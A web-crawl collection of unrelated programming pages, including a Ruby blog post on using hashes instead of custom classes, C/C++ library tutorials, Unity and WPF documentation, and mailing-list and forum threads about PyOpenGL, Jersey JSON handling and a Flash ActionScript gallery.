Not that this happens with any of the presently available compilers, but
it could.
On the other hand, if we can get some nice functionality that cannot be
achieved otherwise, I wouldn't have too many problems with being
pragmatic and extending std.
If it becomes very useful, it might be accepted into the standard or
additional mechanisms not relying on extending std may be provided.
Best regards,
Maurizio
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
|
https://lists.boost.org/Archives/boost/2009/12/160219.php
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Sometimes it's better to use a plain Ruby hash than to create a custom class. In the .NET world, this would be the equivalent of using the generic collections like List instead of hand-rolling your own classes.
One of the things that I’m slowly starting to learn is that excess nil checks are a sign that I’m doing something wrong. In this case, a sign that I may be creating too many layers of models and abstractions. I’m not saying I should never create custom models. But I think there are times when I can simplify my code significantly by using a hash and flattening my code structure into it, instead of relying on custom models.
An Example: A Hash Vs A Class, Used In A View
Examine the following code from a HAML based view in a rails app. and pay attention to the ‘lipids’ and ‘genetics’ variables and how they are used.
- lipids = decision_panel.lipids
- genetics = decision_panel.genetics
%ul
  %li
    %p Apo E
    = scored_value_tag genetics[:apo_e]
  %li
    %p LDL:
    = scored_value_tag lipids.vldl if lipids
There’s nothing terribly magical or special about this code or the use of either of these variables. It does, however, illustrate a subtle yet potentially important distinction between how the lipids and genetics attributes were implemented on the decision_panel class and these differences can have a profound impact on the code that uses them.
The obvious difference between lipids and genetics is that the lipids is a custom class implementation while genetics is a hash. Even without seeing the implementations this is fairly apparent by the syntax. The call to lipids.vldl is not a standard method name on any standard ruby objects. It’s specific to the domain that I’m working in (health care). This gives an indication of the vldl attribute being defined in a class somewhere. Contrast that to the use of generics, which accesses a value via the named key of a hash. It’s very likely that the genetics variable is a hash, given the syntax used.
Nil Checks Can Cause Ugly Things
This is one of the lessons that I’ve been learning the hard way. Look at the difference in use between lipids and genetics in the above code. The line that calls into lipids has an “if lipids” check at the end of it. This is necessary because the lipids variable may be nil. The implementation of the decision_panel.lipids attribute is doing something that may or may not return a valid lipids class. In this specific case, it’s loading data from the database based on some criteria. If that criteria fails to find anything to load, then a nil will be returned.
class DecisionPanel
  def lipids
    Lipids.where(:some_criteria => "some value")
  end
end
It gets worse when we look at what this does to the UI, too. The “if lipids” check at the end of the line causes the entire line of code to not produce anything if the lipids variable is nil. By contract, the call into a hash to get a value may return nil but that nil return value will never cause the line of code to not be executed. When we look at the output of this type of code in our application, we can easily end up with something that looks like this:
(In the off-chance that you actually know what “Apo E” is, please ignore the invalid value of “0”. This is just test data for my dev environment.)
It may be ok for your screens to end up looking like this, but I don’t consider this to be good practice. Having a label for nothing on the screen tends to make users think there is something wrong with the system. It would be much better to have the LDL label showing “N/A” or something equivalent if there is no LDL data to show. However, the way we implemented our models makes this less than beautiful in our code.
In order to show “N/A” we have to do some nil checks. Remember, though, that this LDL line of code is already doing a nil check to make sure the lipids variable is not nil. The verbose way of making this work would be an if-then statement around the code
- if lipids
  = scored_value_tag lipids.vldl
- else
  = scored_value_tag "N/A"
This code is functional, but it is getting pretty verbose and also duplicating a little bit by having to call the ‘scored_value_tag’ method on multiple lines. We can clean this up a little, though
- vldl = (lipids.vldl if lipids) || nil
= scored_value_tag vldl || "N/A"
The first line does all of the if-then checks for us and either assigns vldl to the vldl value or to nil if the lipids variable doesn’t exist. There are actually two separate if-then statements tacked together into this one line, to ensure that we always have a variable to use. If we don’t do this, then we could end up with an exception being thrown when we try to use vldl on the next line.
… that’s 3 if-then statements composed in two lines of code, all surrounding nil checks. That’s a lot of nil checks just to get an “N/A” blob of text to show up in a web page, and quite frankly, a bunch of ugly code (that I’m guilty of writing over and over and over again).
One way this can be remedied is by using the null object pattern in the decision_panel.lipids method. We could have that method always return an object, even when there was no object found, and provide some default behavior to say “N/A” instead of providing an actual value. This may be a good option for you and your scenario. In my case, though, the use of a null object pattern is a little overkill.
In my case, I am starting to see this type of code as …
A Sign That You May Want A Hash Instead
Let’s look at the aggregate code that we’ve ended up with, having implemented the various nil checks from the previous examples. At the same time, let’s add in the code that is needed to produce the same “N/A” value if the genetics code return a nil value:
- lipids = decision_panel.lipids
- genetics = decision_panel.genetics
%ul
  %li
    %p Apo E
    - apo_e = genetics[:apo_e] || "N/A"
    = scored_value_tag apo_e
  %li
    %p LDL:
    - vldl = (lipids.vldl if lipids) || nil
    = scored_value_tag vldl || "N/A"
Tell me, which of those would you rather read when you first encounter this view in the rails app? It’s a pretty easy choice in my book. The use of a hash in this case, has removed 2 out of 3 of the nil checks. The code is significantly easier to read and understand, and easier to modify because there are not a bunch of edge-case nil checks that have to be made.
How, then, do we recognize when it would be easier and/or better to use a hash than to use a custom class? In this case, the excessive nil checks in the code are a sign that we’re doing something wrong. However, there are multiple ways to solve this, including the null object pattern I mentioned previously.
The real sign that this is probably better off as a hash is when we look at the implementation of the lipids class. For effect, I’m posting the entire class, unedited. Ignore the methods and modules that you don’t recognize – just know that they are a part my system and they do what I need.
class Lipids
  include DataParser

  def initialize(obr_segment)
    @obr = obr_segment
  end

  def total
    value = get_obx_value @obr, "0058-8"
    @scored_total ||= ScoredValue.new(value, :lipids_total)
  end

  def hdl
    value = get_obx_value @obr, "0059-6"
    @scored_hdl ||= ScoredValue.new(value, :lipids_hdl)
  end

  def hdl_percentage
    value = get_obx_value @obr, "1764-0"
    @scored_hdl_percentage ||= ScoredValue.new(value, :lipids_hdl_percentage)
  end

  def ldl_calc
    value = (total.value.to_f - (hdl.value.to_f + vldl.value.to_f)).to_s
    @scored_ldl_calc ||= ScoredValue.new(value, :lipids_ldl_calc)
  end

  def triglycerides
    value = get_obx_value @obr, "0155-2"
    @scored_triglycerides ||= ScoredValue.new(value, :lipids_triglycerides)
  end

  def vldl
    value = get_obx_value @obr, "0505-8"
    @scored_vldl ||= ScoredValue.new(value, :lipids_vldl)
  end

  def non_hdl_total
    value = total.value.to_f - hdl.value.to_f
    @scored_non_hdl_total ||= ScoredValue.new(value, :lipids_non_hdl_percentage)
  end

  def non_hdl_percentage
    value = (non_hdl_total.value.to_f / total.value.to_f) * 100
    value.to_i.to_s
  end

  def ldl_hdl_ratio
    value = get_obx_value @obr, "0253-5"
    @scored_ldl_hdl_ratio ||= ScoredValue.new(value, :lipids_ldl_hdl_ratio)
  end
end
The end result of this class definition is that I now have a way to access a just-in-time calculated, cached value by name. Does that sound familiar at all? I hope it does, because with the exception of JIT calculation, I just described a hash: “A Hash is a collection of key-value pairs.” (from Ruby-Doc.org).
Now compare the Lipids class with the code that builds the genetics hash:
def genetics
  @genetics ||= {
    :apo_e      => ScoredValue.new(lab.apo_e, :apo_e),
    :apo_b      => ScoredValue.new(lab.apo_b, :apo_b),
    :lp_a       => ScoredValue.new(lab.lp_a, :lp_a),
    :nt_pro_bnp => ScoredValue.new(lab.nt_pro_bnp, :nt_pro_bnp),
    :kif_6      => ScoredValue.new(lab.kif_6, :kif_6)
  }
end
This code does essentially the same thing (without a calculation, though that would be simple to add to this code) but does it with a hash instead of a custom class. There is far less code to read, even if you account for the calculations that need to be done, and it’s generally easier to see that this is just access to a named set of value. This code also eliminates the desire to have an explicit null object pattern implementation. If the ScoredValue class receives a nil as the first parameter, it can just return “N/A” for us and we don’t have to deal with yet another design pattern and layer of abstraction in our system.
Given the relative simplicity of the genetics hash compared to the lipids class, why, then, am I using a class to define access to a value via a method, which is essentially just a key to get the value that I need? What benefit am I introducing to my system by modeling the access to my data in this way? I honestly don’t think I’m adding any value in this case, and as I’ve shown with my previous discussion of nil checks, I think I’m actually doing more harm than good.
What About Encapsulation Of Business Logic, or … ?
You might be tempted to run off and say that you don’t need custom classes, ever, in your ruby apps. Don’t. That’s just not true. There are times when a custom class or model is appropriate. You may have some business process that needs to be modeled and encapsulated correctly, etc. Hashes are not a panacea or silver bullet. They are, however, a great tool to have in your tool belt. I, for one, am beginning to re-evaluate what I now think is an excessive use of hand-rolled classes and ugly, noisy nil checks.
|
https://lostechies.com/derickbailey/2011/05/25/sometimes-its-better-to-use-a-ruby-hash-than-create-a-custom-class/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
fread() prototype
size_t fread(void * buffer, size_t size, size_t count, FILE * stream);
The
fread() function reads count objects, each of size size bytes, from the given input stream. It is similar to calling fgetc() size times to read each object. If size or count is zero, fread() returns zero and no other action is performed.
It is defined in <cstdio> header file.
fread() Parameters
- buffer: Pointer to the block of memory to store the objects.
- size: Size of each object in bytes.
- count: The number of objects to read.
- stream: The file stream to read the data from.
fread() Return value
The
fread() function returns the number of objects read successfully. If an error or end of file condition occurs, the return value may be less than count.
Example 1: How fread() function works
#include <iostream>
#include <cstdio>
using namespace std;

int main()
{
    FILE *fp;
    char buffer[101];

    fp = fopen("data.txt", "rb");
    while (!feof(fp))
    {
        /* read up to 100 bytes and null-terminate before printing */
        size_t bytesRead = fread(buffer, 1, 100, fp);
        buffer[bytesRead] = '\0';
        cout << buffer;
    }
    fclose(fp);
    return 0;
}
Suppose the file contains following data:
Dennis Ritchie : C Bjarne Stroustrup : C++ Guido van Rossum : Python James Gosling : Java
When you run the program, the output will be:
Dennis Ritchie : C Bjarne Stroustrup : C++ Guido van Rossum : Python James Gosling : Java
Example 2: How fread() function works when either count or size is zero
#include <iostream>
#include <cstdio>
using namespace std;

int main()
{
    FILE *fp;
    char buffer[100];
    int retVal;

    fp = fopen("data.txt", "rb");

    /* when count is zero */
    retVal = fread(buffer, sizeof(buffer), 0, fp);
    cout << "When count = 0, return value = " << retVal << endl;

    /* when size is zero */
    retVal = fread(buffer, 0, 1, fp);
    cout << "When size = 0, return value = " << retVal << endl;

    return 0;
}
When you run the program, the output will be:
When count = 0, return value = 0 When size = 0, return value = 0
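As a final note, here is a short sketch (not part of the original examples; the file name is a placeholder) showing how to tell end-of-file apart from a read error when the return value is less than count:

#include <iostream>
#include <cstdio>
using namespace std;

int main()
{
    int values[10];
    FILE *fp = fopen("data.bin", "rb");
    if (!fp) return 1;

    size_t read = fread(values, sizeof(int), 10, fp);
    if (read < 10)
    {
        if (feof(fp))
            cout << "Reached end of file after " << read << " elements" << endl;
        else if (ferror(fp))
            cout << "Read error after " << read << " elements" << endl;
    }
    fclose(fp);
    return 0;
}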
|
https://www.programiz.com/cpp-programming/library-function/cstdio/fread
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Animation
Clock Class
Definition
Maintains the run-time state of an AnimationTimeline and processes its output values.
public ref class AnimationClock : System::Windows::Media::Animation::Clock
public class AnimationClock : System.Windows.Media.Animation.Clock
type AnimationClock = class inherit Clock
Public Class AnimationClock Inherits Clock
- Inheritance
- AnimationClock
Remarks
AnimationClock objects are generated from AnimationTimeline objects. An AnimationTimeline describes an animation's output values, duration, begin time, end time, and other fundamental animation information. An AnimationClock processes the animation values described by an AnimationTimeline object.
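For illustration only (the element name and the animation values are placeholders, not from this page), an AnimationClock is typically obtained from an AnimationTimeline with CreateClock and applied to a property with ApplyAnimationClock:

// Minimal WPF sketch: create an AnimationClock from an AnimationTimeline
// and drive a dependency property with it.
using System;
using System.Windows;
using System.Windows.Media.Animation;
using System.Windows.Shapes;

public static class ClockExample
{
    public static void Animate(Rectangle myRectangle)
    {
        var animation = new DoubleAnimation(10, 200, new Duration(TimeSpan.FromSeconds(2)));

        // CreateClock returns an AnimationClock that maintains the run-time
        // state (current time, progress) of the timeline.
        AnimationClock clock = animation.CreateClock();

        // Apply the clock to a property instead of calling BeginAnimation.
        myRectangle.ApplyAnimationClock(Rectangle.WidthProperty, clock);
    }
}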
|
https://docs.microsoft.com/en-au/dotnet/api/system.windows.media.animation.animationclock?view=netframework-4.8
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
The drawback to the safety system’s process of copying data is that it also isolates the results of a job within each copy. To overcome this limitation you need to store the results in a type of shared memory called NativeContainer.
A
NativeContainer is a managed value type that provides a relatively safe C# wrapper for native memory. It contains a pointer to an unmanaged allocation. When used with the Unity C# Job System, a
NativeContainer allows a job to access data shared with the main thread rather than working with a copy.
Unity ships with a
NativeContainer called NativeArray. You can also manipulate a
NativeArray with NativeSlice to get a subset of the
NativeArray from a particular position to a certain length.
Note: The Entity Component System (ECS) package extends the
Unity.Collections namespace to include other types of
NativeContainer:
- NativeList - a resizable NativeArray.
- NativeHashMap - key and value pairs.
- NativeMultiHashMap - multiple values per key.
- NativeQueue - a first in, first out (FIFO) queue.
The safety system is built into all
NativeContainer types. It tracks what is reading and writing to any
NativeContainer.
Note: All safety checks on
NativeContainer types (such as out of bounds checks, deallocation checks, and race condition checks) are only available in the Unity Editor and Play Mode.
Part of this safety system is the DisposeSentinel and AtomicSafetyHandle. The
DisposeSentinel detects memory leaks and gives you an error if you have not correctly freed your memory. Triggering the memory leak error happens long after the leak occurred.
Use the
AtomicSafetyHandle to transfer ownership of a
NativeContainer in code. For example, if two scheduled jobs are writing to the same
NativeArray, the safety system throws an exception with a clear error message that explains why and how to solve the problem. The safety system throws this exception when you schedule the offending job.
In this case, you can schedule a job with a dependency. The first job can write to the
NativeContainer, and once it has finished executing, the next job can then safely read and write to that same
NativeContainer. The read and write restrictions also apply when accessing data from the main thread. The safety system does allow multiple jobs to read from the same data in parallel.
By default, when a job has access to a
NativeContainer, it has both read and write access. This configuration can slow performance. The C# Job System does not allow you to schedule a job that has write access to a
NativeContainer at the same time as another job that is writing to it.
If a job does not need to write to a
NativeContainer, mark the
NativeContainer with the
[ReadOnly] attribute, like so:
[ReadOnly] public NativeArray<int> input;
In the above example, you can execute the job at the same time as other jobs that also have read-only access to the first
NativeArray.
Note: There is no protection against accessing static data from within a job. Accessing static data circumvents all safety systems and can crash Unity. For more information, see C# Job System tips and troubleshooting.
When creating a
NativeContainer, you must specify the type of memory allocation you need. The allocation type depends on the length of time the job runs. This way you can tailor the allocation to get the best performance possible in each situation.
There are three Allocator types for
NativeContainer memory allocation and release. You need to specify the appropriate one when instantiating your
NativeContainer.
- Temp has the fastest allocation and is intended for allocations with a lifespan of one frame or fewer. You should not pass NativeContainer allocations using Temp to jobs. You also need to call the Dispose method before you return from the method call (such as MonoBehaviour.Update, or any other callback from native to managed code).
- TempJob is a slower allocation than Temp but is faster than Persistent. It is for allocations within a lifespan of four frames and is thread-safe. If you don’t Dispose of it within four frames, the console prints a warning, generated from the native code. Most small jobs use this NativeContainer allocation type.
- Persistent is the slowest allocation but can last as long as you need it to. Longer jobs can use this NativeContainer allocation type. You should not use Persistent where performance is essential.
For example:
NativeArray<float> result = new NativeArray<float>(1, Allocator.TempJob);
Note: The number 1 in the example above indicates the size of the
NativeArray. In this case, it has only one array element (as it only stores one piece of data in
result).
2018–06–15 Page published
C# Job System exposed in 2018.1 NewIn20181
|
https://docs.unity3d.com/Manual/JobSystemNativeContainer.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
C Programming/wchar.h/wcsncmp
In the C language, the function wcsncmp is declared in the header file wchar.h. The functions wcsncmp, wcscmp, strncmp, and strcmp are all used to compare strings. wcsncmp compares two fixed-size wide-character strings and looks similar to strncmp(); it is the wide-character equivalent of the strncmp() function. The function wcsncmp is also similar to wcscmp, but it compares only the first n characters.
Description
wcsncmp is a standard library function used to compare two wide-character strings. It is similar to the standard library function strcmp, but differs from it in two ways. First, wcsncmp compares the two strings only up to a limit of at most n characters (the size_t n argument), whereas strcmp compares until a terminating '\0' occurs. Second, it handles wide characters, as mentioned above. It compares the wide-character string pointed to by a and the wide-character string pointed to by b, but at most n wide characters from each string.
If the wide-character string a is greater than the wide-character string b at the first differing position i (i < n), wcsncmp returns a positive integer; if b is greater than a at the first differing position i (i < n), wcsncmp returns a negative integer. If the first n wide characters of a and b are equal, wcsncmp returns 0.
Required Header Files
Syntax
#include<stdio.h>
#include <wchar.h>
int wcsncmp(const wchar_t *a, const wchar_t *b, size_t n);
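Example
A short illustrative sketch (not from the original page) showing how the n limit changes the result:

#include <stdio.h>
#include <wchar.h>

int main(void)
{
    const wchar_t *a = L"wikibooks";
    const wchar_t *b = L"wikipedia";

    /* The first 4 wide characters ("wiki") are equal, so this returns 0 */
    printf("first 4: %d\n", wcsncmp(a, b, 4));

    /* At position 4, L'b' < L'p', so comparing 6 characters gives a negative value */
    printf("first 6 is negative: %d\n", wcsncmp(a, b, 6) < 0);
    return 0;
}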
|
https://en.m.wikibooks.org/wiki/C_Programming/C_Reference/wchar.h/wcsncmp
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Hello soya-user, hello pyopengl-users. This message isn't _totally_
relevant to pyopengl-users, but it's not unlikely that you guys have the
requisite knowledge to help me fix this problem.
I've been trying to get Soya3d
() working for a while,
but it's got problems with initialization. Soya3d talks to the OpenGL
API directly with Pyrex. The problem is that a bunch of the calls it's
making to OpenGL are returning NULL, while PyOpenGL calls to the same
functions are returning expected values. At first we thought this was a
problem with the way Soya was initializing GL (It uses SDL_Init to
accomplish this), like it wasn't properly waiting for the OpenGL system
to be initialized before it was making the calls. But to disprove that,
I wrote this bit of Pyrex code:
.. inside of soya's init() function...
from OpenGL import GL
print "PyOGL:", GL.glGetString(GL.GL_VENDOR)
my_dump_info()
cdef void my_dump_info():
cdef char* gl_vendor
gl_vendor = <char*> glGetString(GL_VENDOR)
if gl_vendor == NULL:
print "OGL: Wargh glGetString returned NULL"
check_gl_error()
else:
print "OGL:", PyString_FromString(gl_vendor)
GL.glGetString was returning the expected "NVIDIA Corporation", but the
direct call to the C glGetString is still returning NULL. The call to
check_gl_error does a glCheckError, but that's returning GL_NO_ERROR.
The same thing happens for stuff like glGetIntegerv.
So the only conclusion I can draw here is that somehow the PyOpenGL
interface is calling these functions in a way that's different from
pyrex's direct calls to them. I tried reading through the source of
PyOpenGL but the SWIG stuff wasn't elucidative. It just seems like the
wrappers are pretty direct. Does PyOpenGL involve some kind of different
context that it might use where a direct call to the C interface wouldn't?
--
Twisted | Christopher Armstrong: International Man of Twistery
Radix | Release Manager, Twisted Project
---------+
We don't do anything particularly fancy in the wrapper for glGetString,
here's what it looks like for the generated OpenGL 1.1 wrapper from
PyOpenGL 2.0.1.08:
static PyObject *_wrap_glGetString(PyObject *self, PyObject *args) {
PyObject *resultobj;
GLenum arg1 ;
GLubyte *result;
PyObject * obj0 = 0 ;
if(!PyArg_ParseTuple(args,(char *)"O:glGetString",&obj0)) return NULL;
arg1 = (GLenum) PyInt_AsLong(obj0);
if (PyErr_Occurred()) return NULL;
{
result = (GLubyte *)glGetString(arg1);
if (GLErrOccurred()) return NULL;
}
{
if (result)
{
resultobj= PyString_FromString(result);
}
else
{
Py_INCREF(resultobj = Py_None);
}
}
return resultobj;
}
I can't see anything there which is markedly different from your
approach. PyOpenGL is fairly minimal wrt what it sets up for contexts.
AFAIK we aren't doing anything funky with initialising our reference to
OpenGL, leaving the context-creation work to the GUI libraries as much
as possible, (though I should note that that stuff would all have been
written by someone else, so it could be we spend thousands of lines of
code on it somewhere and I've just missed it during maintenance). We do
some minimal stuff such as defining functions for retrieving the current
context under OpenGL 1.0, but I doubt that's relevant.
From the docs:
()
GL_INVALID_OPERATION is generated if glGetString is executed
between the
execution of glBegin and the corresponding execution of glEnd.
I'd confirm that you are not calling this within those functions.?
Seems your check_gl_error() isn't picking up the failure for some
reason, but that doesn't solve the base problem.
Good luck,
Mike
________________________________________________
Mike C. Fletcher
Designer, VR Plumber, Coder
Mike C. Fletcher wrote:
Thanks for the help, Mike! I don't know if you remember, but I think we
met at PyCon this year; I was rambling about how horrible the scene is
for open source 3d game engines with you and Tamer ;)
> We don't do anything particularly fancy in the wrapper for glGetString,
> here's what it looks like for the generated OpenGL 1.1 wrapper from
> PyOpenGL 2.0.1.08:
>
[snip C code]
Here's the C code that's being generated from pyrex from that snippet I
showed in my post:
char (*__pyx_v_gl_vendor);
/* ... */
int __pyx_2;
/* ... */
/* "/home/radix/Projects/soya/init.pyx":307 */
__pyx_v_gl_vendor = ((char (*))glGetString(GL_VENDOR));
/* "/home/radix/Projects/soya/init.pyx":308 */
__pyx_2 = (__pyx_v_gl_vendor == 0);
if (__pyx_2) {
/* etc */
So the (__pyx_v_gl_vendor == 0) is ALWAYS true, no matter WHAT I pass to
glGetString (I tried random numbers like 9999), and glCheckError is
NEVER returning an error code. Are all of those (implicit) casts reasonable?
I also checked that the value of GL_VENDOR is expected; it's the same as
PyOpenGL.GL.GL_VENDOR.
> From the docs:
> ()
> GL_INVALID_OPERATION is generated if glGetString is executed
> between the
> execution of glBegin and the corresponding execution of glEnd.
>
> I'd confirm that you are not calling this within those functions.
I checked with Jiba, as well as the soya source code, and indications
are that it's not being called between glBegin and glEnd.
>?
Something might be going wrong with my error checking code, since no
matter what I pass to glGetString, I'm not getting any errors.
I should mention that this code is working for other people; but I don't
know if any of those other people are using the implementation of OpenGL
provided by NVidia's proprietary Linux drivers (anyone?).
Thanks for the help, I'll flail around at the problem some more.
--
Twisted | Christopher Armstrong: International Man of Twistery
Radix | Release Manager, Twisted Project
---------+
|
https://sourceforge.net/p/pyopengl/mailman/message/3123715/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Reviewed-by: Benoît Canet <ben...@scylladb.com> 2017-01-13 14:35 GMT+01:00 Nadav Har'El <n...@scylladb.com>:
> There's no reason to use std::mutex where we can use Osv's "mutex".
> std::mutex basically wraps OSv's mutex by a Posix mutex and then C++'s
> mutex implementation, adding both compile-time and run-time overheads -
> which are not huge, but not zero either.
>
> To use "mutex" we need to stop doing "using namespace std", because that
> makes the name "mutex" ambiguous.
>
> Signed-off-by: Nadav Har'El <n...@scylladb.com>
> ---
>  fs/vfs/vfs_mount.cc | 10 ++++------
>  1 file changed, 4 insertions(+), 6 deletions(-)
>
> diff --git a/fs/vfs/vfs_mount.cc b/fs/vfs/vfs_mount.cc
> index ef6f29e..9e241ad 100644
> --- a/fs/vfs/vfs_mount.cc
> +++ b/fs/vfs/vfs_mount.cc
> @@ -53,17 +53,15 @@
>  #include <memory>
>  #include <list>
>
> -using namespace std;
> -
>  /*
>   * List for VFS mount points.
>   */
> -static list<mount*> mount_list;
> +static std::list<mount*> mount_list;
>
>  /*
>   * Global lock to access mount point.
>   */
> -static std::mutex mount_lock;
> +static mutex mount_lock;
>
>  /*
>   * Lookup file system.
> @@ -452,11 +450,11 @@ mount_desc to_mount_desc(mount* m)
>      return ret;
>  }
>
> -vector<mount_desc>
> +std::vector<mount_desc>
>  current_mounts()
>  {
>      WITH_LOCK(mount_lock) {
> -        vector<mount_desc> ret;
> +        std::vector<mount_desc> ret;
>          for (auto&& mp : mount_list) {
>              ret.push_back(to_mount_desc(mp));
>          }
> --
> 2.9.
|
https://www.mail-archive.com/osv-dev@googlegroups.com/msg01022.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
#include "petscdm.h" #include "petscdmlabel.h" #include "petscds.h" PetscErrorCode DMCreateInterpolation(DM dm1,DM dm2,Mat *mat,Vec *vec
|
http://www.mcs.anl.gov/petsc/petsc-dev/docs/manualpages/DM/DMCreateInterpolation.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I've been Googling my butt off trying to find out how to do this: I have a Jersey REST service. The request that invokes the REST service contains a JSON object. My question is, from the Jersey POST method implementation, how can I get access to the JSON that is in the body of the HTTP request?
Any tips, tricks, pointers to sample code would be greatly appreciated.
Thanks...
--Steve
I'm not sure how you would get at the JSON string itself, but you can certainly get at the data it contains as follows:
Define a JAXB annotated Java class (C) that has the same structure as the JSON object that is being passed on the request.
e.g. for a JSON message:
{ "A": "a value", "B": "another value" }
Use something like:
@XmlAccessorType(XmlAccessType.FIELD)
public class C {
    public String A;
    public String B;
}
Then, you can define a method in your resource class with a parameter of type C. When Jersey invokes your method, the JAXB object will be created based on the POSTed JSON object.
@Path("/resource") public class MyResource { @POST public put(C c) { doSomething(c.A); doSomethingElse(c.B); } }
|
https://codedump.io/share/TMIoLlza4SL1/1/consuming-json-object-in-jersey-service
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 14, 2011 9:19 AM
I was following this tutorial on how to add a scrolling image gallery to a Flash website.
()
From what I understand from this tutorial, it is just a matter of copying the Actionscript code and pasting it onto the timelines then making modifications on the XML.
(kindly see a screenshot of timeline layers I made and as to where I put the Actionscript code: )
I pasted the code onto the blank keyframe labeled "Gallery"...
But all I get is this weird effect when I click on the button for the gallery...
(kindly see a screenshot of it here: )
When you put a blank keyframe on a timeline, any content put in there is supposed to only be contained in that very frame, right? How come then that - whenever the gallery button is clicked on - the content from that section spills out onto the other sections even when I click on other button for the other areas?
I just really couldn't think why this is happening - any reason why this is so?
And how do I position the gallery right under the section header and menu bar?
Here is its AS2 code, by the way:
import mx.transitions.Tween;
import mx.transitions.easing.*;
var myGalleryXML = new XML();
myGalleryXML.ignoreWhite = true;
myGalleryXML.load("gallery.xml");
myGalleryXML.onLoad = function() {
_root.gallery_x = myGalleryXML.firstChild.attributes.gallery_x;
_root.gallery_y = myGalleryXML.firstChild.attributes.gallery_y;
_root.gallery_width = myGalleryXML.firstChild.attributes.gallery_width;
_root.gallery_height = myGalleryXML.firstChild.attributes.gallery_height;
_root.myImages = myGalleryXML.firstChild.childNodes;
_root.myImagesTotal = myImages.length;
_root.thumb_height = myGalleryXML.firstChild.attributes.thumb_height;
_root.thumb_width = myGalleryXML.firstChild.attributes.thumb_width;
_root.full_x = myGalleryXML.firstChild.attributes.full_x;
_root.full_y = myGalleryXML.firstChild.attributes.full_y;
callThumbs();
createMask();
scrolling();
};
function callThumbs() {
_root.createEmptyMovieClip("container_mc",_root.getNextHighestDepth());
container_mc._x = _root.gallery_x;
container_mc._y = _root.gallery_y;
var clipLoader = new MovieClipLoader();
var preloader = new Object();
clipLoader.addListener(preloader);
for (i=0; i<myImagesTotal; i++) {
thumbURL = myImages[i].attributes.thumb_url;
myThumb_mc = container_mc.createEmptyMovieClip(i, container_mc.getNextHighestDepth());
myThumb_mc._y = _root.thumb_height*i;
clipLoader.loadClip("thumbs/"+thumbURL,myThumb_mc);
preloader.onLoadStart = function(target) {
target.createTextField("my_txt",target.getNextHighestDepth (),0,0,100,20);
target.my_txt.selectable = false;
};
preloader.onLoadProgress = function(target, loadedBytes, totalBytes) {
target.my_txt.text = Math.floor((loadedBytes/totalBytes)*100);
};
preloader.onLoadComplete = function(target) {
new Tween(target, "_alpha", Strong.easeOut, 0, 100, .5, true);
target.my_txt.removeTextField();
target.onRelease = function() {
callFullImage(this._name);
};
target.onRollOver = function() {
this._alpha = 50;
};
target.onRollOut = function() {
this._alpha = 100;
};
};
}
}
function callFullImage(myNumber) {
myURL = myImages[myNumber].attributes.full_url;
myTitle = myImages[myNumber].attributes.title;
_root.createEmptyMovieClip("fullImage_mc",_root.getNextHighestDepth());
fullImage_mc._x = _root.full_x;
fullImage_mc._y = _root.full_y;
var fullClipLoader = new MovieClipLoader();
var fullPreloader = new Object();
fullClipLoader.addListener(fullPreloader);
fullPreloader.onLoadStart = function(target) {
target.createTextField("my_txt",fullImage_mc.getNextHighestDepth (),0,0,200,20);
target.my_txt.selectable = false;
};
fullPreloader.onLoadProgress = function(target, loadedBytes, totalBytes) {
target.my_txt.text = Math.floor((loadedBytes/totalBytes)*100);
};
fullPreloader.onLoadComplete = function(target) {
new Tween(target, "_alpha", Strong.easeOut, 0, 100, .5, true);
target.my_txt.text = myTitle;
};
fullClipLoader.loadClip("full_images/"+myURL,fullImage_mc);
}
function createMask() {
_root.createEmptyMovieClip("mask_mc",_root.getNextHighestDepth());
mask_mc._x = _root.gallery_x;
mask_mc._y = _root.gallery_y;
mask_mc.beginFill(0x000000,100);
mask_mc.lineTo(_root.gallery_width,0);
mask_mc.lineTo(_root.gallery_width,_root.gallery_height);
mask_mc.lineTo(0,_root.gallery_height);
mask_mc.lineTo(0,0);
container_mc.setMask(mask_mc);
}
function scrolling() {
_root.onEnterFrame = function() {
container_mc._y += Math.cos(((mask_mc._ymouse)/mask_mc._height) *Math.PI)*15;
if (container_mc._y>mask_mc._y) {
container_mc._y = mask_mc._y;
}
if (container_mc._y<(mask_mc._y-(container_mc._height-mask_mc._height))) {
container_mc._y = mask_mc._y-(container_mc._height-mask_mc._height);
}
};
}
1. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 14, 2011 10:31 AM (in response to flash_bugged)1 person found this helpful
When you add content dynamically and do not plant it into a timeline-based home (such as an empty movieclip) it does not have a home on the timeline. So if you are loading your images into that dynamically created movieclip, instead, manually place an empty movieclip in that frame and load the images into there.
2. Re: Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 14, 2011 11:18 PM (in response to Ned Murphy)
So what I should have done is to put a "blank keyframe" for me to place that gallery into? Or should I have made the frame as a movie clip then put in the AS2 code within its frame?
3. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 15, 2011 4:10 AM (in response to flash_bugged)1 person found this helpful
You should manually create a movieclip symbol with nothing in it and take a copy of it from the library and place it in the frame where you intend for the gallery to display. Give it an instance name of "container_mc" and remove the following line from your callThumbs function
_root.createEmptyMovieClip("container_mc",_root.getNextHigh estDepth());
You probably need to do the same for the mask and the full images since they appear to also be created using dynamic mc's.
4. Re: Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 15, 2011 8:49 AM (in response to Ned Murphy)
When that (gallery) has been made into a movieclip, all I have to do then is to put an AS2 that will position it in the main stage as I want it then? Any suggestion for an AS2 code that can position such? (even if it be just an algorithm or something) :-)
Pardon me if I seem to be irritating - I am starting to see things clearly anyway... sorry :-)
5. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 15, 2011 10:40 AM (in response to flash_bugged)
If you just add the 3 empty movieclips to the stage with the names your code would have given their dynamic counterparts, and get rid of the lines that would otherwise create them dynamically, the rest of your code appears to take care of placing the movieclips where they belong. I recommend you try stuff rather than keep questioning it.
|
